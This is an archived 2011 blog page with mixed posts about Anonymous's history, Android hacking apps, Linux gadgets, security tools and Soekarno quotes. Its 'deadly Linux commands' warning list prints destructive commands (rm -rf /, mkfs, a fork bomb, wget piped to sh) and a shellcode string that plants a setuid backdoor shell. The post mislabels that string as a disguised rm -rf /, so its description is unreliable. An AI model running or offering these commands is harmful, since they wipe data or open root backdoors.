Thursday, August 18, 2011

Anonymous


We [Anonymous] just happen to be a group of people on the internet who need — just kind of an outlet to do as we wish, that we wouldn't be able to do in regular society. ...That's more or less the point of it. Do as you wish. ... There's a common phrase: 'we are doing it for the lulz.'
We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us.
[Anonymous is] the first Internet-based superconsciousness. Anonymous is a group, in the sense that a flock of birds is a group. How do you know they're a group? Because they're traveling in the same direction. At any given moment, more birds could join, leave, peel off in another direction entirely. 
Anonymous merupakan salah satu "kelompok" hacker yang saat ini terkenal bersama dengan lulzSec dan teaMPoisoN. Mereka merupakan organisasi tanpa pemimpin dan bergerak dengan penentuan operasi tertentu yang biasanya digerakkan melalui social media seperti YouTube, Twitter, dan IRC channel mereka.
Karena tidak memiliki kepemimpinan itu terkadang pengklaiman kasus hacking mereka jadi membingungkan, satu grup menyatakan mereka melakukan apa, dan grup lain ternyata menyatakan sesuatu yang lain. Misalnya dari ancaman terbaru mereka yaitu untuk meng-kill Facebook yang beritanya sudah tersebar bebas, ternyata itu hanya di-iyakan oleh beberapa anggota dan yang lainnya menyatakan kebalikannya.
Sejarah mereka sudah cukup panjang, dimulai dari tahun 2003 di situs imageboard 4chan.

Anonymous (used as a mass noun) is a group initiating active civil disobedience and spread through the Internet while staying hidden, originating in 2003 on the imageboard 4chan, representing the concept of many online community users simultaneously existing as an anarchic, digitized global brain.[2] It is also generally considered to be a blanket term for members of certain Internet subcultures, a way to refer to the actions of people in an environment where their actual identities are not known.
In its early form, the concept has been adopted by a decentralized online community acting anonymously in a coordinated manner, usually toward a loosely self-agreed goal, and primarily focused on entertainment. Beginning with 2008, the Anonymous collective has become increasingly associated with collaborative, international hacktivism, undertaking protests and other actions, often with the goal of promoting internet freedom and freedom of speech. Actions credited to "Anonymous" are undertaken by unidentified individuals who apply the Anonymous label to themselves as attribution.
Mari kita lihat sejarah aksi Anonymous ini :

  • Habbo Raid (2006) : Habbo merupakan social networking yang berkonsep seperti hotel bagi penggunanya, karena dianggap menyebarkan isu rasisme,mereka menjadi sasaran Anonymous.
  • Hal Turner Raid (2006) : masih mengenai isu rasisme, mereka mendeface web milik penyiar Hal Turner dan menyebabkan kerugian karena pembayaran bandwidth, Hal mencoba menuntut di pengadilan, tapi gagal.
  • Penahanan Chris Forcand (2007) : Chris merupakan seorang kriminal yang melakukan tindakan asusila, orang-orang dari Anonymous melaporkan Chris setelah diperlihatkan foto-foto menjijikkan perbuatannya.
  • Project Chanology (2008) : Project menentang Church of Scientology / Christian Science. Karena mereka dianggap melawan kebebasan berbicara. Serangan dilakukan bukan cuma di dunia maya dengan DDoS, black faxes dan prank calls, tetapi juga melalui aksi di dunia nyata melalui demonstrasi dengan masa sekitar 8000 orang. Disinilah muncul topeng legendaris V for Vendetta Guy Fawkes.
  • Deface AllHipHop dan SOHH (2008) : lagi-lagi tentang rasisme, biasa dilakukan dengan flooding DDoS dan kemudian juga XSS sampai akhirnya bisa mencuri data-data penting di web itu.
  • No Cussing Club (2009) : penyerangan terhadap McKay Hatch yang menentang penggunaan umpatan,  dilakukan dengan penyebaran data-data pribadi Hatch yang kemudian menyebabkan keluarga Hatch menerima teror melalui paket mengerikan, telpon dan surat.
  • Youtube Porn's Day (2009) : mengupload video-video porno ke Youtube dan mentagnya dengan judul normal, pada hari itu sukses membanjiri Youtube dengan video porno.
  • Pemilu Iran (2009) : pemrotesan saat Pemilu di Iran yang kembali memenangkan Ahmadinejad. Iran kemudian melakukan Internet censoring, menutupi dari dunia mengenai gerakan pemrotes yang tidak setuju dengan pemilu itu. Anonymous bekerja sama dengan PirateBay dan beberapa hacker Iran memberikan media untuk pejuang Iran agar bisa berhubungan dengan dunia luar.

*i'll update it soon*

Categories: , , , , , ,

Android App for Hacker

Android actually same as other linux Distribution, it just have some speciality (do not say limitability please..) to just run on ARM based device. The backbone is same, Linux Powerfull Kernel. It make me curious, is Android can be able to be an online mobile hacking station?
Then I search on internet, Google mostly, I found a lot of article, there's a lot of people already think about it, and they do not just think, they already make an application too. I'll share with you some apps and thing that I've found on the net for now.

ConnectBot
ConnectBot is an open-source SSH client for your Android mobile. With this nifty little app, you can connect to any SSH server located on this planet (and beyond). Features include simultaneous SSH connections, tunneling, and copy/pasting between different applications. There are plenty of other SSH apps, but according to user ratings, this is by far, the best one out there. It has a 5 star rating from about 21,397 users, so go ahead and start connecting.

App Link: https://market.android.com/details?id=org.connectbot

Hacker's Keyboard
A good hacker loves his or her keyboard more than anything else. It's their only weapon, which brings them a notch closer to their goal of world domination. Whether you've just started or have already conquered half of Antarctica, this little app will allow you to use a full-fledged keyboard on your Android tablet or phone. Apart from being a good replacement to the default Android keyboard, Hacker's Keyboard acts as a perfect companion to the aforementioned ConnectBot app. So, you no longer have to worry about mistyping those life-changing commands you tap in the wee hours of the morning.

App Link: https://market.android.com/details?id=org.pocketworkstation.pckeyboard


Android IRC
You have managed to establish that vital SSH connection that shuts off Skynet. You're just a few taps away from becoming a global superhero. And, in the heat of the moment, you forgot the final command! Bummer! What will you do? Of course, like every seasoned Linux user, you'll seek help on IRC. That's where this great app called Android IRC steps in. In this app, you get all the features of a full-fledged IRC client, thus making sure that help is just a tap away. This is by far the best and the most advanced IRC client for Android and undoubtedly it is not free. Go ahead, give it a try.

App Link: https://market.android.com/details?id=com.countercultured.irc&feature=related_apps


Irssi ConnectBot
This is a modified version of the aforementioned ConnectBot app thus allowing users to use Irssi, the popular IRC client on their phones. Irssi ConnectBot is a free application that has managed to get 4 and ½ ratings so far with more than 10000 downloads.

App Link: https://market.android.com/details?id=org.woltage.irssiconnectbot


Touchqode
If you are a compulsive coder, traveling might be a big hurdle in your marathon programming sessions. If you own an Android device, then thanks to this app, your nerdy mind won't be cranky on the bus anymore. Just install this free application and enjoy most of the features of a desktop IDE. Touchqode currently supports Java, HTML, JavaScript, Python, C++, C#, Ruby and PHP. It also has an FTP and SFTP client built in so that you can upload your code instantly.

App Link: https://market.android.com/details?id=com.touchqode.editor&feature=search_result

FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK).
It’s kind of like Firesheep for android, but maybe a bit easier to use (and it works on WPA2!).
Do note that a rooted phone is required. Please note that if the webuser uses SSL this application won’t work This application due to its nature is very phone-dependent so please let the author know if it doesn’t work for you.
There’s a great video demo of it working here:

Android Network Toolkit
I think this one is enormous. At Defcon, developer Zimperium, a security firm, demonstrated an Android application called the Android Network Toolkit (Anti, for short) that would allow users to exploit unprotected devices on security-free WiFi networks (or networks that they have gained access to).
The firm says the tool’s purpose is for people to find aged exploits and patch them so that “hacking” their network and taking control of devices connected to it isn’t as easy as putting together a 10 piece puzzle. It will allow users to do more than just “find” these exploits, though – you can actually act on them as if you had every intent to cause malintent.
Commands like “man-in-the-middle”, a snooping tool, and “attack” allow users to intercept data and control devices with the push of a button.
Security entities claim some people pay up to $10,000 for this sort of functionality whether it be for internal security testing or for malintent, but Zimperium’s application will be made available for free for non-commercial use and only $10 for a corporate license in the Android market sometime within the next week.

undefined

The idea is to use Anti to detect weaknesses in a network or machine so that they can be patched or fixed. But even zImperium knows that Anti can cause serious damage in the wrong hands. The company left a note in the app saying, 
Please remember, with great power comes great responsibility. Use it wisely.




 The Last from this article is the dream of every hacker maybe, a mobile backtrack. This is *not* a native client! This is the chroot + VNC method that we'd been using to get Ubuntu running with Android for a while. The article makes it sound like that's the case, but sadly it's not. However, with the chroot + VNC method we can really run BackTrack 5 on an Android device, and it really does work. This takes some technical skills, and isn't for the non-Linux experienced user.
Yeah it's need a lot of extra skill and time, but if it can run smoothly, why not?



Categories: , , , ,

5 Most Popular Linux Hackable Gadget


Linux is a powerful and versatile operating system that can be utilized to hack just about any electronic hardware device. To prove it, I have here a list of popular gadgets that are already known to run Linux.


1. Nintendo DS

DSLinux, a port of the Linux operating system, made it possible to install Linux on Nintendo DS. DSLinux runs a modified µClinux kernel. It is currently based on uCLinux 2.6.14 (Linux-2.6.14-hsc0). It only runs in textmode and nano-x which is displayed via a custom framebuffer console driver. Input is done via a keyboard displayed on the touchscreen of the Nintendo DS. DSLinux has no package management facilities. Instead, DSLinux builds are distributed as a single tar archive.

With the exception of the microphone, all hardware inside the Nintendo DS, including the wireless is supported by DSLinux. The Nintendo DS firmware can be read from /dev/firmware, but write support is left out for safety reasons.


2. Apple iPod

iPod, everybody’s favorite music player can be installed with Linux. A µClinux-based Linux distribution called iPodLinux is able to run on several iPod models. When the iPodLinux kernel is booted it takes the place of Apple's iPod operating system and automatically loads Podzilla, an alternative GUI and launcher for a number of additional included programs such as a video player, an image viewer, a command line shell, games, emulators for video game consoles, Computer programming demos, and other experimental or occasionally unfinished Computer software.

Here are some of Podzilla’s features:
* An iPod-like user interface
* Video playback with sound
* Support for AAC, MP3 and basic OGG playback (4G & 5G Music Player Daemon is multifunctional, but can be fixed)
* Many games, including TuxChess, Bluecube (Tetris clone), Chopper, StepMania (a Dance Dance Revolution clone) and more
* Recording through audio jack at much higher quality than Apple's firmware
* Ability to play the games Doom and Doom II (and presumably any Doom Total Conversion; Chex Quest for instance)
* Ability to run many emulators, such as iBoy (Nintendo Game Boy Emulator), iNES (Nintendo Entertainment System Emulator), iDarcNES (port of the multiple system emulator DarcNES), iMAME (port of Multiple Arcade Machine Emulator), and iGPSP (Game Boy Advance emulator)


If you are interested in installing Linux on your iPod (5th Generation Video iPod), perhaps this will help: 13 Not-So-Easy Steps to Install Linux on iPod

3. Microsoft Xbox

Xbox Linux is a project that ported the Linux computer operating system to the Microsoft Xbox. There is also a newer project for the Xbox 360, Free60. Because the Xbox uses a digital signature system to prevent the public from running unsigned code, one must either use a modchip, or find an alternative system for running unsigned code. Since the Xbox is essentially just a PC, with a custom processor, a hard drive, RAM, and 4 USB ports, it is capable to run several readily available Linux distributions smoothly. "Xebian", an Xbox compatible version of Debian, and Gentoox, a similarly customized version of Gentoo are known to run successfully on Xbox.

An Xbox with Linux can be a full desktop computer with mouse and keyboard, a web/email box connected to a TV, a server, router or a node in a cluster. One can either dual-boot or use Linux only; in the latter case, one can replace both IDE devices. One can also connect the Xbox to a VGA monitor. A converter may be needed to use keyboards/mice in the controller ports, however this is fairly easy to achieve because the Xbox uses the standard USB bus.


4. Nintendo GameCube

Nintendo GameCube Linux is a project to port Linux to the Nintendo GameCube (and now the Wii) in the same manner as Xbox Linux. The GameCube was seen to be a less attractive system to port Linux to since it not only lacked an on-board Ethernet port and internal hard drive, but also an optical drive natively capable of reading DVDs.

Nintendo GameCube Linux also recognizes SD Cards and Multimedia Cards and is able to use them normally, given the appropriate adaptor.


5. Sony PlayStation

Linux for PlayStation 2, a kit released by Sony Computer Entertainment in 2002, allows the PlayStation 2 console to be used as a personal computer. It included a Linux-based operating system, a USB keyboard and mouse, a VGA adapter, a PS2 network adaptor (Ethernet only), and a 40 GB hard disk drive (HDD). The PS2 Linux distribution is based on Kondara MNU/Linux, a Japanese distribution itself based on Red Hat Linux. PS2 Linux is similar to Red Hat Linux 6, and has most of the features one might expect in a Red Hat Linux 6 system.

The Linux Kit turns the PlayStation 2 into a full-fledged computer system, but it does not allow for use of the DVD-ROM drive except to read PS1 and PS2 discs due to piracy concerns by Sony. Noted open source software that compiles on the kit includes Mozilla Suite, X-Chat, and Gaim. Light-weight applications better suited to the PS2's 32MB of RAM include xv, Dillo, Ted, and AbiWord. The default window manager is Window Maker, but it is possible to install and use Fluxbox and FVWM.

Linux for PlayStation 2 Kit

The PlayStation 3 is also capable of running Linux. Many distributions are compatible with the console. Debian, Fedora 8, Gentoo, OpenSuSE and Ubuntu can be run on the PlayStation 3. Yellow Dog Linux for the PlayStation 3 was first released for the PS3 in late 2006.

Yellow Dog Linux on PS 3


Categories: , , , , , , , ,

10 Essential UNIX/Linux Command Cheat Sheets


Linux has become so idiot proof nowadays that there is less and less need to use the command line. However, the commands and shell scripts have remained powerful for advanced users to utilize to help them do complicated tasks quickly and efficiently.

To those of you who are aspiring to become a UNIX/Linux guru, you have to know loads of commands and learn how to effectively use them. But there is really no need to memorize everything since there are plenty of cheat sheets available on the web and on books. To spare you from the hassles of searching, I have here a collection of 10 essential UNIX/Linux cheat sheets that can greatly help you on your quest for mastery:


UNIX Tutorial for Beginners
This is a quick and easy UNIX/Linux tutorial page that is aimed at beginners. It gives a subtle introduction to some of the most important UNIX/Linux commands.



Learning the Shell
Aside from showing you how to apply the most basic UNIX/Linux commands, “Learning the Shell’ will teach you the utmost importance of using the command line.



Learn UNIX in 10 Minutes
From the page: This is something that I had given out to students (CAD user training) in years past. The purpose was to have on one page the basics commands for getting started using the UNIX shell (so that they didn't call me asking what to do the first time someone gave them a tape).



FOSSwire Unix/Linux Command Cheat Sheet
A one page UNIX/Linux command reference that you can download in PDF format. You can easily print it, and then paste it on your wall.

UNIX Toolbox
From the page: This document is a collection of Unix/Linux/BSD commands and tasks which are useful for IT work or for advanced users. This is a practical guide with concise explanations; however the reader is supposed to know what s/he is doing.


Practical Linux Command Line Reference
This is another handy one-page cheat sheet for common command line operations. All of the commands have been tested on Fedora and Ubuntu.


How to Look Like a UNIX Guru
From the page: This lecture takes you through the basic commands and then shows you how to combine them in simple patterns or idioms to provide sophisticated functionality like histogramming. This lecture assumes you know what a shell is and that you have some basic familiarity with UNIX.



A Directory of Linux Commands (in alphabetical order)
From the O'reilly book “Linux in a Nutshell, 5th Edition”, it features an alphabetical list of 687 commands and a short description on each one of them.

Linux Security Quick Reference Guide
This quick reference guide (in PDF) will serve as your aid on improving the security of your Linux system. It provides some pointers to more in-depth security information that could help you become a good UNIX/Linux system administrator.


Bash Programming Cheat Sheet
From the page: A quick cheat sheet for programmers who want to do shell scripting. This is not intended to teach programming, etc. but it is intended for someone who knows one programming language to begin learning about bash scripting.

nb : actually I (cap-cay) just ever used the last, bash scriping guide, the other not yet. :)

Categories: , , , ,

The 7 Deadly Linux Commands


If you are new to Linux, chances are you will meet a stupid person perhaps in a forum or chat room that can trick you into using commands that will harm your files or even your entire operating system. To avoid this dangerous scenario from happening, I have here a list of deadly Linux commands that you should avoid.


1. Code:

rm -rf /

This command will recursively and forcefully delete all the files inside the root directory.

2. Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

3. Code:

mkfs.ext3 /dev/sda

This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.

4. Code:

:(){:|:&};:

Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

5. Code:

any_command > /dev/sda

With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6. Code:
wget http://some_untrusted_source -O- | sh

Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.

7. Code:
mv /home/yourhomedirectory/* /dev/null

This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.

There are of course other equally deadly Linux commands that I fail to include here, so if you have something to add, please share it with us via comment.

Categories: , , ,

Best Security Software Tools for Linux

source : http://www.junauza.com/2008/07/10-best-hacking-and-security-software.html

Linux is a hacker’s dream computer operating system. It supports tons of tools and utilities for cracking passwords, scanning network vulnerabilities, and detecting possible intrusions. I have here a collection of 10 of the best security software tools for Linux. Please always keep in mind that these tools are not meant to harm, but to protect.


1. John the Ripper

John the Ripper is a free password cracking software tool initially developed for the UNIX operating system. It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL and others.


2. Nmap

Nmap is my favorite network security scanner. It is used to discover computers and services on a computer network, thus creating a "map" of the network. Just like many simple port scanners, Nmap is capable of discovering passive services on a network despite the fact that such services aren't advertising themselves with a service discovery protocol. In addition Nmap may be able to determine various details about the remote computers. These include operating system, device type, uptime, software product used to run a service, exact version number of that product, presence of some firewall techniques and, on a local area network, even vendor of the remote network card.

Nmap runs on Linux, Microsoft Windows, Solaris, and BSD (including Mac OS X), and also on AmigaOS. Linux is the most popular nmap platform and Windows the second most popular.


3. Nessus

Nessus is a comprehensive vulnerability scanning software. Its goal is to detect potential vulnerabilities on the tested systems such as:

-Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
-Misconfiguration (e.g. open mail relay, missing patches, etc).
-Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
-Denials of service against the TCP/IP stack by using mangled packets

Nessus is the world's most popular vulnerability scanner, estimated to be used by over 75,000 organizations worldwide. It took first place in the 2000, 2003, and 2006 security tools survey from SecTools.Org.


4. chkrootkit

chkrootkit (Check Rootkit) is a common Unix-based program intended to help system administrators check their system for known rootkits. It is a shell script using common UNIX/Linux tools like the strings and grep commands to search core system programs for signatures and for comparing a traversal of the /proc filesystem with the output of the ps (process status) command to look for discrepancies.

It can be used from a "rescue disc" (typically a Live CD) or it can optionally use an alternative directory from which to run all of its own commands. These techniques allow chkrootkit to trust the commands upon which it depend a bit more.

There are inherent limitations to the reliability of any program that attempts to detect compromises (such as rootkits and computer viruses). Newer rootkits may specifically attempt to detect and compromise copies of the chkrootkit programs or take other measures to evade detection by them.


5. Wireshark

Wireshark is a free packet sniffer computer application used for network troubleshooting, analysis, software and communications protocol development, and education. In June 2006, the project was renamed from Ethereal due to trademark issues.

The functionality Wireshark provides is very similar to tcpdump, but it has a GUI front-end, and many more information sorting and filtering options. It allows the user to see all traffic being passed over the network (usually an Ethernet network but support is being added for others) by putting the network interface into promiscuous mode.

Wireshark uses the cross-platform GTK+ widget toolkit, and is cross-platform, running on various computer operating systems including Linux, Mac OS X, and Microsoft Windows. Released under the terms of the GNU General Public License, Wireshark is free software.


6. netcat

netcat is a computer networking utility for reading from and writing to network connections on either TCP or UDP.

Netcat was voted the second most useful network security tool in a 2000 poll conducted by insecure.org on the nmap users mailing list. In 2003, it gained fourth place, a position it also held in the 2006 poll.

The original version of netcat is a UNIX program. Its author is known as *Hobbit*. He released version 1.1 in March of 1996.

Netcat is fully POSIX compatible and there exist several implementations, including a rewrite from scratch known as GNU netcat.


7. Kismet

Kismet is a network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. Kismet will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b and 802.11g traffic.

Kismet is unlike most other wireless network detectors in that it works passively. This means that without sending any loggable packets, it is able to detect the presence of both wireless access points and wireless clients, and associate them with each other.

Kismet also includes basic wireless IDS features such as detecting active wireless sniffing programs including NetStumbler, as well as a number of wireless network attacks.


8. hping

hping is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan scanning technique (also invented by the hping author), and now implemented in the Nmap Security Scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in very short time.

Like most tools used in computer security, hping is useful to both system administrators and crackers (or script kiddies).


9. Snort

Snort is a free and open source Network Intrusion prevention system (NIPS) and network intrusion detection (NIDS) capable of performing packet logging and real-time traffic analysis on IP networks.

Snort performs protocol analysis, content searching/matching, and is commonly used to actively block or passively detect a variety of attacks and probes, such as buffer overflows, stealth port scans, web application attacks, SMB probes, and OS fingerprinting attempts, amongst other features. The software is mostly used for intrusion prevention purposes, by dropping attacks as they are taking place. Snort can be combined with other software such as SnortSnarf, sguil, OSSIM, and the Basic Analysis and Security Engine (BASE) to provide a visual representation of intrusion data. With patches for the Snort source from Bleeding Edge Threats, support for packet stream antivirus scanning with ClamAV and network abnormality with SPADE in network layers 3 and 4 is possible with historical observation.


10. tcpdump

tcpdump is a common computer network debugging tool that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

In some Unix-like operating systems, a user must have superuser privileges to use tcpdump because the packet capturing mechanisms on those systems require elevated privileges. However, the -Z option may be used to drop privileges to a specific unprivileged user after capturing has been set up. In other Unix-like operating systems, the packet capturing mechanism can be configured to allow non-privileged users to use it; if that is done, superuser privileges are not required.

The user may optionally apply a BPF-based filter to limit the number of packets seen by tcpdump; this renders the output more usable on networks with a high volume of traffic.


11. Ettercap

Ettercap is a console-based network sniffer/interceptor/logger that is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols. Ettercap supports active and passive dissection of many protocols (including ciphered ones) and provides many features for network and host analysis. Ettercap also has the ability to actively or passively find other poisoners on the LAN.



12. Nikto

Nikto is a web server scanner that is known to perform comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers. It performs generic and server type specific checks. It also captures and prints any cookies received.



13. OpenSSH

OpenSSH is a Free and Open Source version of the SSH connectivity tools providing encrypted communication sessions over a computer network. It encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks. Additionally, OpenSSH provides secure tunneling capabilities and several authentication methods, and supports all SSH protocol versions.



14. Aircrack-ng

Aircrack-ng is a wireless tool and password cracker. It is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.



15. Tripwire

Tripwire is a security and data integrity tool that is useful for monitoring and alerting on specific file change(s) on a range of systems. Used with system files on a regular basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner.



16. Metasploit Framework

Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit-building demo.



17. THC Hydra

THC (The Hacker's Choice) Hydra uses a dictionary attack to test for weak or simple passwords on one or many remote hosts running a variety of different services. It was designed as a proof-of-concept utility to demonstrate the ease of cracking poorly chosen passwords. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.



18. Dsniff

Dsniff is suite of powerful network auditing and penetration-testing tools and utilities that includes code to parse many different application protocols and extract interesting information. The information that can be obtained from this sniff application are: usernames and passwords, web pages being visited, contents of email, etc.



19. RainbowCrack

RainbowCrack is a password hash cracker that makes use of a large-scale time-memory trade-off. It differs from "conventional" brute force crackers in that it uses large pre-computed tables called rainbow tables to reduce the length of time needed to crack a password drastically.



20. rkhunter

rkhunter scans for rootkits, backdoors and possible local exploits. It does this by comparing SHA-1 hashes of important files with known good ones in online database, searching for default directories (of rootkits), wrong permissions, hidden files, suspicious strings in kernel modules, and special tests for Linux and FreeBSD.

Categories: , , , ,

Wednesday, August 17, 2011

Soekarno

Sewaktu mencari Quote dari Bung Karno, mendapati betapa semangatnya Beliau, terbayan dari kata-katanya, benar-benar seorang pemimpin yang keras dan luar biasa. Membayangkan kapan Indonesia memiliki lagi sosok pemimpin seperti ini, yang dipilih berdasar mufakat bersama dan justru diminta menjadi Presiden, menunjukkan kesatuan visi bangsa dan tujuannya untuk kebaikan bersama, bukan golongan tertentu.



Ir.Soekarno lahir 6 Juni 1901 wafat 21 Juni 1970 Daftar Presiden Indonesia pertama Indonesia, menjabat periode 1945 - 1966. Memproklamasikan Kemerdekaan Indonesia pada tanggal 17 Agustus 1945 bersama Mohammad Hatta. Kutipan


§ "Gantungkanlah cita-citamu setinggi langit."


§ "Seribu orang tua hanya dapat bermimpi, satu orang pemuda dapat mengubah dunia."


§ Dikutip dari Bung Karno, Penyambung Lidah Rakyat Indonesia.


§ "Bunga mawar tidak mempropagandakan harum semerbaknya, dengan sendirinya harum semerbaknya itu tersebar di sekelilingnya."


§ Diucapkan ketika menyematkan bintang sakti kepada dua orang perwira, yaitu Mayor Benny Moerdani dari RPKAD dan Mayor Untung bin Sjamsuri dari Banteng Raiders.


§ Kutipan Pidato Bung Karno di Semarang 29 Juli 1956.


§ "Negeri kita kaya, kaya, kaya-raya, Saudara-saudara. Berjiwa besarlah, berimagination. Gali ! Bekerja! Gali! Bekerja! Kita adalah satu tanah air yang paling cantik di dunia".


§ Kutipan Pidato Bung Karno di semarang 29 Juli 1956.


§ "Dan agar yang tidak murni terbakar mati!"


§ Pidato tertulis PJM Presiden Sukarno pada Konferensi Besar GMNI di Kaliurang Jogjakarta, 17 Februari 1959.pengguna: Terbangkelangit 08:12, 16 Februari 2008 (UTC)



SEJARAH


§ "Massa adalah penentu sejarah, "the makers of history!"


§ Kutipan Pidato Bung Karno di Semarang 29 Juli 1956


§ "Jangan sekali-sekali meninggalkan sejarah ."


§ Salah satu judul pidato beliau. Disingkat menjadi JASMERAH.


§ Ini dadaku, mana dadamu? Kalau Malaysia mau konfrontasi ekonomi, Kita hadapi dengan konfrontasi ekonomi. Kalau Malaysia mau konfrontasi politik, Kita hadapi dengan konfrontasi politik. Kalau Malaysia mau konfrontasi militer, Kita hadapi dengan konfrontasi militer


MARHAENISME


§ "Dan siapakah yang saya namakan kaum Marhaen itu?


Yang saya namakan Marhaen adalah setiap rakyat Indonesia yang melarat atau lebih tepat: yang telah dimelaratkan oleh setiap kapitalisme, imprealisme dan kolonialisme."


§


§ Pidato tertulis PJM Presiden Sukarno pada Konferensi Besar GMNI di Kaliurang Jogjakarta, 17 Februari 1959.


§ "Kaum Marhaen ini terdiri dari tiga unsur:


Pertama : Unsur kaum proletar Indonesia (buruh) Kedua : Unsur kaum tani melarat Indonesia, dan Ketiga : kaum melarat Indonesia yang lain-lain"


§


§ Pidato tertulis PJM Presiden Sukarno pada Konferensi Besar GMNI di Kaliurang Jogjakarta, 17 Februari 1959.


§ "Dan siapakah yang saya maksud dengan kaum Marhaenis? Kaum Marhaenis adalah setiap pejuang dan setiap patriot Bangsa. Yang mengorganisir berjuta-juta kaum Marhaen itu, dan Yang bersama-sama dengan tenaga massa Marhaen itu hendak menumbangkan sistem kapitalisme, imprealisme, kolonialisme, dan


Yang bersama-sama dengan massa Marhaen itu membanting tulang untuk membangun Negara dan masyarakat, yang kuat, bahagia sentosa, adil dan makmur."


§


§ Pidato tertulis PJM Presiden Sukarno pada Konferensi Besar GMNI di Kaliurang Jogjakarta, 17 Februari 1959.


KEMERDEKAAN


§ Adakah Lenin ketika dia mendirikan negara Soviet Rusia merdeka telah mempunyai Dnepprprostoff, dan yang maha besar di sungai Dneppr? Apa ia telah mempunyai radio stationyang menyundul ke angkasa? Apa ia telah mempunyai kereta-kereta api cukup untuk meliputi seluruh negara Rusia? Apakah tiap-tiap orang Rusia pada waktu Lenin mendirikan Soviet-Rusia merdeka telah dapat membaca dan menulis? Tidak, Tuan-tuan yang terhormat!


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945


§ Indonesia merdeka, political independence, politieke onafhankelijkheid, tidak lain dan tidak bukan ialah satu jembatan!


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945


§ Manakala sesuatu bangsa telah sanggup mempertahankan negerinya dengan darahnya sendiri, dengan dagingnya sendiri, pada saat itu bangsa itu telah masak untukkemerdekaan. Kalau bangsa kita, Indonesia, walaupun dengan bambu runcing, Saudara-saudara, semua siap sedia mati mempertahankan tanah air kita Indonesia, pada saat itu bangsa Indonesia adalah siap sedia, masak untuk merdeka.


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945


§ Jika tiap-tiap orang Indonesia yang 70 milyun ini lebih dahulu harus merdeka di dalam hatinya, sebelum kita mencapai political independence, saya ulangi lagi, sampai lebur kiamat kita belum dapat Indonesia merdeka! Di dalam Indonesia merdeka itulah kita memerdekakan rakyat kita! Di dalam Indonesia merdeka itulah kita memerdekakan hatinya bangsa kita! Di dalam Saudi Arabia merdeka, Ibn Saud memerdekakan rakyat Arabia satu per satu. Di dalam Soviet-Rusia merdeka Stalin memerdekakan hati bangsa Soviet-Rusia satu per satu.


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945


§ Di seberang jembatan, jembatan emas inilah, baru kita leluasa menyusun masyarakat Indonesia merdeka yang gagah, kuat, sehat, kekal dan abadi.


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945


§ Tidak peduli rakyat dapat baca atau tidak, tidak peduli rakyat hebat ekonominya atau tidak, tidak peduli rakyat bodoh atau pintar, asal menurut hukum internasional mempunyai syarat-syarat suatu negara merdeka, yaitu ada rakyatnya, ada buminya dan ada pemerintahannya, sudahlah ia merdeka.


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945


§ Apakah kita mau Indonesia merdeka yang kaum kapitalisnya merajalela, ataukah yang semua rakyatnya sejahtera, yang semua orang cukup makan, cukup pakaian, hidup dalam kesejahteraan, merasa dipangku oleh Ibu Pertiwi yang cukup memberi sandang pangan kepadanya?


§ Sumber: Soekarno, Pidato di BPUPKI, 1 Juni 1945


